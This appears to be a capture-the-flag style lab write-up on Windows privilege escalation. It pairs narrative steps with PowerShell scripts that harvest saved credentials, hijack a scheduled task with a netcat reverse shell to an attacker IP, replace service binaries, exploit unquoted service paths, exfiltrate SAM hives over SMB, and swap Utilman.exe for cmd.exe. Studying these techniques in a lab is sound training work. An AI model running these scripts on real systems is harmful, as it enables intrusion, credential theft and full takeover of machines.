Windows Privilege Escalation
February 15, 2024
Last updated
February 15, 2024
Task 1:
Task 2:
Task 3:
This spawns a cmd session as the user mike.katz, using the credential that is already saved on the box.
Recap:
We now have credentials for three users:
mike.katz, from the saved credentials list: his password is stored on the machine, so we can use that saved credential to spawn a cmd session as that user
thom.smith, from the saved PuTTY sessions
db_admin, from the web.config file
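The three credential sources above, as an added PowerShell example (not part of the original write-up). It lists Credential Manager entries, dumps the saved PuTTY sessions from the registry, and greps web.config files for connection strings. The search root C:\inetpub is an assumption (the default IIS location); change it if the site lives elsewhere.

```powershell
# 1. Credentials saved in Credential Manager. An entry for a user means
#    runas /savecred can start a process as that user without typing the password.
Write-Host '== Saved credentials (cmdkey) =='
cmdkey /list
# Use, once a target user is found (mike.katz is the user named on the page):
#   runas /savecred /user:mike.katz cmd.exe

# 2. PuTTY saved sessions. Host, username and, if a proxy is configured, the proxy
#    password are stored in clear text under HKCU\Software\SimonTatham\PuTTY\Sessions.
Write-Host '== PuTTY sessions =='
$sessionsKey = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
if (Test-Path $sessionsKey) {
    Get-ChildItem $sessionsKey | ForEach-Object {
        $s = Get-ItemProperty $_.PSPath
        [pscustomobject]@{
            Session       = $_.PSChildName   # URL-encoded session name
            HostName      = $s.HostName
            UserName      = $s.UserName
            ProxyUsername = $s.ProxyUsername
            ProxyPassword = $s.ProxyPassword
        }
    } | Format-Table -AutoSize
}

# 3. Connection strings in web.config. IIS applications keep DB credentials here in
#    clear text unless the section was encrypted with aspnet_regiis.
Write-Host '== web.config connection strings =='
$ConfigSearchRoot = 'C:\inetpub'   # assumption: default IIS web root
if (Test-Path $ConfigSearchRoot) {
    Get-ChildItem -Path $ConfigSearchRoot -Filter web.config -Recurse -ErrorAction SilentlyContinue |
        Select-String -Pattern 'connectionString|password=' |
        ForEach-Object { "$($_.Path):$($_.LineNumber): $($_.Line.Trim())" }
}
```

All three are read-only checks that any local user can run; none of them needs elevation, which is exactly why these locations are worth checking first.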
Task 4:
This returns the full details of the task vulntask: the command it runs, the account it runs as, and when it is triggered.
This command lists all scheduled tasks on the system.
This shows the ACL of the file (who can read, write or modify it), roughly the Windows equivalent of ls -la on Linux.
Write a netcat reverse shell command into the .bat file that the task executes, then run the task.
You get a reverse shell as taskuser1.
Then read the flag in that user's Desktop directory.
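The same check generalised to every scheduled task, as an added example (not the page's own commands): it finds tasks whose action file the current user can modify and then exploits a hit the way the page does for vulntask. The attacker address is the one used on the page; the listener port and the location of netcat on the victim are assumptions. Requires the ScheduledTasks module (Windows 8 / Server 2012 and later).

```powershell
function Get-WritableTaskActions {
    # Identities we treat as "us": the current user plus groups every user is in.
    # Custom group memberships are not considered, so this can miss hits.
    $me = @("$env:USERDOMAIN\$env:USERNAME", 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $exe = $action.Execute          # only exec actions have this; others give $null
            if (-not $exe) { continue }
            $path = [Environment]::ExpandEnvironmentVariables($exe.Trim('"'))
            if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }   # bare names relying on PATH are skipped
            # WriteData (bit 2) is contained in Write, Modify and FullControl;
            # GENERIC_WRITE / GENERIC_ALL cover ACEs that were never mapped to specific rights.
            $writable = (Get-Acl -LiteralPath $path).Access | Where-Object {
                $rights = [int]$_.FileSystemRights
                $_.AccessControlType -eq 'Allow' -and
                ($me -contains $_.IdentityReference.Value) -and
                (($rights -band 2) -or ($rights -band 0x40000000) -or ($rights -band 0x10000000))
            }
            if ($writable) {
                [pscustomobject]@{
                    Task       = $task.TaskName
                    TaskPath   = $task.TaskPath
                    RunsAs     = $task.Principal.UserId
                    Action     = $path
                    Arguments  = $action.Arguments
                    WritableBy = ($writable.IdentityReference.Value -join ', ')
                }
            }
        }
    }
}

Get-WritableTaskActions | Format-Table -AutoSize

# Exploit a hit the way the page does for vulntask.
$hit = Get-WritableTaskActions | Where-Object { $_.Task -eq 'vulntask' }
if ($hit) {
    $AttackerIp = '10.9.193.229'        # attacker address used on the page
    $Port       = 4444                  # assumption: port the listener uses
    $NcPath     = 'C:\tools\nc64.exe'   # assumption: netcat already transferred to the victim
    # Append rather than overwrite, so whatever the task did before still runs.
    Add-Content -Path $hit.Action -Value "$NcPath -e cmd.exe $AttackerIp $Port"
    # With nc -lvnp 4444 listening on the attacker, fire the task instead of waiting for its trigger.
    schtasks /run /tn "$($hit.TaskPath)$($hit.Task)"
}
```

The audit looks only at the file the task executes. A task whose action is not writable can still be abused if the directory it lives in is writable (the file can be renamed and replaced), so treat a writable parent directory as a hit too.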
Second Task
Task 5:
All service configurations are stored in the registry under HKLM\SYSTEM\CurrentControlSet\Services\.
First Task
As shown here, the WindowsScheduler service runs the executable WService.exe,
and the service runs under the account svcuser1.
First, create our own payload, which is just a simple reverse shell executable.
Then transfer the reverse shell to the victim machine.
Once the payload is on the victim, replace the service executable with it:
Rename WService.exe so we keep a backup.
Move the payload we created earlier into place as WService.exe, the path the service expects.
Use icacls to grant Everyone permission to execute the new file, so the service account can run it.
Stop the WindowsScheduler service first so that it reloads its executable.
Starting the service again then runs the executable we swapped in,
so we get a shell from our reverse shell payload.
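The procedure above as one PowerShell script, added here as an example (not the page's own commands). The service name and binary are the ones named on the page; the payload location is an assumption. Note that in PowerShell `sc` is an alias for Set-Content, so the service control tool must be called as sc.exe.

```powershell
$ServiceName = 'WindowsScheduler'
$Payload     = 'C:\Users\Public\rev-svc.exe'   # assumption: reverse shell already uploaded here

# 1. Where is the binary and which account runs it? Win32_Service exposes the same fields
#    that "sc qc" prints as BINARY_PATH_NAME and SERVICE_START_NAME.
$svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
"$($svc.Name): PathName=$($svc.PathName) StartName=$($svc.StartName) State=$($svc.State)"

# Strip quotes and arguments to get the executable path. (For an unquoted path with spaces
# this split is wrong; that case is the unquoted-service-path issue, handled separately.)
$exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split ' ')[0] }

# 2. Can we write to it? Look for (F), (M) or (W) granted to a group we are in.
icacls $exe

# 3. Swap the binary: keep a backup, drop the payload in its place, let everyone execute it.
Move-Item -LiteralPath $exe -Destination "$exe.bkp" -Force
Copy-Item -LiteralPath $Payload -Destination $exe
icacls $exe /grant 'Everyone:F'

# 4. Restart the service so the service control manager launches the new binary.
#    Start the listener on the attacker first (nc -lvnp <port>).
sc.exe stop $ServiceName
Start-Sleep -Seconds 2
sc.exe start $ServiceName
```

The service will report a start failure after a few seconds because the payload never calls StartServiceCtrlDispatcher; by then the reverse shell has already connected back, so the failure is cosmetic. Put the backup back afterwards so the service keeps working.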
Second Task
As shown here, the Disk Sorter Enterprise service runs as the user svcusr2,
and the path to its executable contains spaces and is not quoted:
"Disk Sorter Enterprise"
First, check whether we have permission to write to a directory on the path to that executable.
icacls shows that Users have write data (WD) on it, which means we can create files in that directory.
We proceed to create a reverse shell payload
and transfer it to the victim machine.
Then we move the reverse shell executable into the MyPrograms directory,
since that is where the service control manager will look for the executable first.
Because the path is unquoted, Windows treats each space as a possible end of the executable name: for "Disk Sorter Enterprise" it first tries "Disk",
which resolves to Disk.exe, then "Disk Sorter", which resolves to Disk Sorter.exe, and only then the real path.
We then grant Everyone permission on the file so that it can be executed by svcusr2.
Stop the service so that it resolves the executable path again on the next start.
When the service starts it runs Disk.exe first, since that is the first candidate Windows finds, and treats it as the service executable.
We get our reverse shell and read the flag on the Desktop of the user the service runs as.
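The search order described above, generalised to every service on the machine as an added example (not the page's code): it lists services with an unquoted path containing spaces, prints the candidate executables Windows would try in order, and flags candidates whose directory a normal user can create files in, using icacls as the page does. The Disk Sorter Enterprise service is one instance of what this finds.

```powershell
function Test-DirWritable([string]$Dir) {
    # Rely on icacls like the page: a (F), (M), (W) or (WD) entry for a group every user is in.
    if (-not (Test-Path -LiteralPath $Dir)) { return $false }
    $out = icacls $Dir 2>$null
    [bool]($out | Select-String -Pattern '(Everyone|BUILTIN\\Users|Authenticated Users):\S*\((F|M|W|WD)\)')
}

function Get-UnquotedServicePaths {
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and
        $_.PathName -notmatch '^"' -and          # not already quoted
        $_.PathName -match '^[A-Za-z]:\\' -and   # absolute path (skips svchost-style entries)
        $_.PathName -match ' '                   # contains at least one space
    } | ForEach-Object {
        $svc = $_
        # Drop arguments: keep everything up to and including the first ".exe"
        $full = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
        $parts = $full -split ' '
        # Windows tries "<prefix up to each space>.exe" before the real file, in order.
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        foreach ($cand in $candidates) {
            [pscustomobject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                RealPath    = $full
                Candidate   = $cand
                DirWritable = (Test-DirWritable (Split-Path -Path $cand -Parent))
            }
        }
    }
}

Get-UnquotedServicePaths | Format-Table -AutoSize
```

For a path like C:\MyPrograms\Disk Sorter Enterprise\... the candidates come out as C:\MyPrograms\Disk.exe and C:\MyPrograms\Disk Sorter.exe, and a row with DirWritable set to True is the one to drop the payload at. The fix on the defending side is simply to quote BINARY_PATH_NAME in the service configuration.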
Third Task
Task 6:
First Task
First, check the privileges of our user (THMBackup) on the victim machine.
We can see that we have SeBackupPrivilege and SeRestorePrivilege.
"The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges."
This saves the SYSTEM hive to a file named system.hive in the THMBackup user's directory (the equivalent of a home directory on Linux).
The second command does the same for the SAM hive. The SAM database contains usernames, user account information, security descriptors and the password hashes.
Then we start an SMB server on the attacker machine so that other hosts can reach it over SMB/CIFS (Common Internet File System).
With the SMB server running, we go back to the victim machine and run the copy commands.
The first copies sam.hive from the user's directory to the public share on our attacker machine, \\10.9.193.229\public.
Second Task
As always, we first check the privileges of the user we are running as. This one has SeTakeOwnershipPrivilege, which allows taking ownership of any object on the system, including files and registry keys. That opens up many possibilities for elevation: for example, we could search for a service running as SYSTEM and take ownership of the service's executable.
As shown here, utilman.exe runs with SYSTEM privileges, the highest level of access on the machine. It is comparable to root, since the SYSTEM account has access to all files on the system.
Since our privilege lets us take ownership of any file, we take ownership of Utilman.exe, which is owned by the system.
Notice that being the owner of a file doesn't necessarily mean you have permissions on it, but as the owner you can assign yourself any permissions you need.
So ownership alone doesn't let us replace the file; we also grant ourselves full control with icacls, so we can do whatever we want with it.
Then we copy cmd.exe (comparable to /bin/bash on Linux) over utilman.exe, so that whenever utilman.exe is launched we get a command prompt running as SYSTEM, the account that launches it from the logon screen.
Then lock the screen and click the Ease of Access button, which launches utilman.exe, and you get a shell as SYSTEM.
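The SeTakeOwnershipPrivilege steps above as one script, added here as an example (not the page's commands). It adds one thing the page does not do: a backup of the original Utilman.exe, so the logon screen can be restored afterwards. The backup location is an assumption.

```powershell
$target = "$env:SystemRoot\System32\Utilman.exe"
$backup = "$env:TEMP\Utilman.exe.bak"     # assumption: where we keep the original
$me     = "$env:USERDOMAIN\$env:USERNAME"

# 1. The privilege must be on the token; takeown enables it itself, so Disabled is fine.
if (-not (whoami /priv | Select-String 'SeTakeOwnershipPrivilege')) {
    throw 'SeTakeOwnershipPrivilege not held'
}

# 2. Before: the owner is a system principal (normally NT SERVICE\TrustedInstaller) and we have no write access.
"Owner before: $((Get-Acl $target).Owner)"

# 3. Take ownership, then grant ourselves Full control. Ownership by itself grants no access,
#    only the right to rewrite the DACL, so the icacls step is required.
takeown /f $target
icacls $target /grant "${me}:F"
"Owner after:  $((Get-Acl $target).Owner)"

# 4. Keep a copy, then overwrite Utilman.exe with cmd.exe.
Copy-Item $target $backup
Copy-Item "$env:SystemRoot\System32\cmd.exe" $target -Force

# 5. Lock the workstation and click the Ease of Access button on the logon screen:
#    winlogon launches Utilman.exe as SYSTEM, so a SYSTEM cmd.exe appears on the logon desktop.
rundll32.exe user32.dll,LockWorkStation

# Restore afterwards: Copy-Item $backup $target -Force
```

The same pattern works for any SYSTEM-launched binary the privilege lets you own; Utilman.exe is convenient only because it can be triggered from the logon screen without a session.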
Third Task
Visit the IP address, which serves the IIS web server. First find out which user you are running as.
Then list that user's privileges; as shown, this user holds a lot of privileges.
Task 7: